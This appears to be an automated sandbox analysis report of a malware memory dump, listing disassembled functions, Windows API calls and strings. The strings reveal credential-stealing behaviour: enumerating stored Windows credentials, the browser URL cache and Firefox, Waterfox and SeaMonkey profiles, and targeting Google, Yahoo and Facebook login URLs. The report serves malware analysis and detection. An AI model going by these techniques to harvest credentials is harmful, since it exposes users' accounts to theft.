                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                            • memset.MSVCRT ref: 0040BC75
                                            • memset.MSVCRT ref: 0040BC8C
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                            • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                            • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                            • String ID:
                                            • API String ID: 115830560-3916222277

                                            Control-flow Graph

                                            control_flow_graph 764 41837f-4183bf 765 4183c1-4183cc call 418197 764->765 766 4183dc-4183ec call 418160 764->766 771 4183d2-4183d8 765->771 772 418517-41851d 765->772 773 4183f6-41840b 766->773 774 4183ee-4183f1 766->774 771->766 775 418417-418423 773->775 776 41840d-418415 773->776 774->772 777 418427-418442 call 41739b 775->777 776->777 780 418444-41845d CreateFileW 777->780 781 41845f-418475 CreateFileA 777->781 782 418477-41847c 780->782 781->782 783 4184c2-4184c7 782->783 784 41847e-418495 GetLastError free 782->784 787 4184d5-418501 memset call 418758 783->787 788 4184c9-4184d3 783->788 785 4184b5-4184c0 call 444706 784->785 786 418497-4184b3 call 41837f 784->786 785->772 786->772 794 418506-418515 free 787->794 788->787 794->772
                                            APIs
                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                            • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                            • GetLastError.KERNEL32 ref: 0041847E
                                            • free.MSVCRT ref: 0041848B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CreateFile$ErrorLastfree
                                            • String ID: |A
                                            • API String ID: 77810686-1717621600

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 0041249C
                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                            • wcscpy.MSVCRT ref: 004125A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                            • String ID: r!A
                                            • API String ID: 2791114272-628097481

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                            • _wcslwr.MSVCRT ref: 0040C817
                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                            • wcslen.MSVCRT ref: 0040C82C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                            • API String ID: 2936932814-4196376884
                                            APIs
                                            • memset.MSVCRT ref: 0040A824
                                            • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                            • wcscpy.MSVCRT ref: 0040A854
                                            • wcscat.MSVCRT ref: 0040A86A
                                            • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                            • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                            • String ID: C:\Windows\system32
                                            • API String ID: 669240632-2896066436
                                            APIs
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                            • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                            • wcslen.MSVCRT ref: 0040BE06
                                            • wcsncmp.MSVCRT ref: 0040BE38
                                            • memset.MSVCRT ref: 0040BE91
                                            • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                            • wcschr.MSVCRT ref: 0040BF24
                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                            • String ID:
                                            • API String ID: 697348961-0
                                            APIs
                                            • memset.MSVCRT ref: 00403CBF
                                            • memset.MSVCRT ref: 00403CD4
                                            • memset.MSVCRT ref: 00403CE9
                                            • memset.MSVCRT ref: 00403CFE
                                            • memset.MSVCRT ref: 00403D13
                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                            • memset.MSVCRT ref: 00403DDA
                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                            • String ID: Waterfox$Waterfox\Profiles
                                            • API String ID: 4039892925-11920434
                                            APIs
                                            • memset.MSVCRT ref: 00403E50
                                            • memset.MSVCRT ref: 00403E65
                                            • memset.MSVCRT ref: 00403E7A
                                            • memset.MSVCRT ref: 00403E8F
                                            • memset.MSVCRT ref: 00403EA4
                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                            • memset.MSVCRT ref: 00403F6B
                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                            Strings
                                            Similarity
                                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                            • API String ID: 4039892925-2068335096
                                            APIs
                                            • memset.MSVCRT ref: 00403FE1
                                            • memset.MSVCRT ref: 00403FF6
                                            • memset.MSVCRT ref: 0040400B
                                            • memset.MSVCRT ref: 00404020
                                            • memset.MSVCRT ref: 00404035
                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                            • memset.MSVCRT ref: 004040FC
                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                            Strings
                                            Similarity
                                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                            • API String ID: 4039892925-3369679110
                                            APIs
                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                            Strings
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                            • API String ID: 3510742995-2641926074
                                            APIs
                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                            • memset.MSVCRT ref: 004033B7
                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                            • wcscmp.MSVCRT ref: 004033FC
                                            • _wcsicmp.MSVCRT ref: 00403439
                                            Strings
                                            Similarity
                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                            • String ID: $0.@
                                            • API String ID: 2758756878-1896041820
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                            • String ID:
                                            • API String ID: 2941347001-0
                                            APIs
                                            • memset.MSVCRT ref: 00403C09
                                            • memset.MSVCRT ref: 00403C1E
                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                            • wcscat.MSVCRT ref: 00403C47
                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                            • wcscat.MSVCRT ref: 00403C70
                                            Strings
                                            Similarity
                                            • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                            • API String ID: 1534475566-1174173950
                                            APIs
                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                            • memset.MSVCRT ref: 00414C87
                                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • wcscpy.MSVCRT ref: 00414CFC
                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                            Strings
                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                            Similarity
                                            • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                            • API String ID: 71295984-2036018995
                                            APIs
                                            • wcschr.MSVCRT ref: 00414458
                                            • _snwprintf.MSVCRT ref: 0041447D
                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                            Strings
                                            Similarity
                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                            • String ID: "%s"
                                            • API String ID: 1343145685-3297466227
                                            APIs
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                            Strings
                                            Similarity
                                            • API ID: AddressHandleModuleProcProcessTimes
                                            • String ID: GetProcessTimes$kernel32.dll
                                            • API String ID: 1714573020-3385500049
                                            APIs
                                            • memset.MSVCRT ref: 004087D6
                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                            • memset.MSVCRT ref: 00408828
                                            • memset.MSVCRT ref: 00408840
                                            • memset.MSVCRT ref: 00408858
                                            • memset.MSVCRT ref: 00408870
                                            • memset.MSVCRT ref: 00408888
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                            Similarity
                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                            • String ID:
                                            • API String ID: 2911713577-0
                                            APIs
                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                            Strings
                                            Similarity
                                            • API ID: memcmp
                                            • String ID: @ $SQLite format 3
                                            • API String ID: 1475443563-3708268960
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: _wcsicmpqsort
                                            • String ID: /nosort$/sort
                                            • API String ID: 1579243037-1578091866
                                            • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                            • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                            APIs
                                            • memset.MSVCRT ref: 0040E60F
                                            • memset.MSVCRT ref: 0040E629
                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                            Strings
                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                            Similarity
                                            • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                            • API String ID: 2887208581-2114579845
                                            • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                            • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                            APIs
                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                            Similarity
                                            • API ID: Resource$FindLoadLockSizeof
                                            • String ID:
                                            • API String ID: 3473537107-0
                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                            APIs
                                            Strings
                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                            Similarity
                                            • API ID: memset
                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                            • API String ID: 2221118986-1725073988
                                            • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                            • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                            APIs
                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                            • DeleteObject.GDI32(00000000), ref: 004125E7
                                            Strings
                                            Similarity
                                            • API ID: ??3@DeleteObject
                                            • String ID: r!A
                                            • API String ID: 1103273653-628097481
                                            • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                            • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                            Similarity
                                            • API ID: ??2@
                                            • String ID:
                                            • API String ID: 1033339047-0
                                            • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                            • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                            APIs
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                            • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                            Strings
                                            Similarity
                                            • API ID: AddressProc$memcmp
                                            • String ID: $$8
                                            • API String ID: 2808797137-435121686
                                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
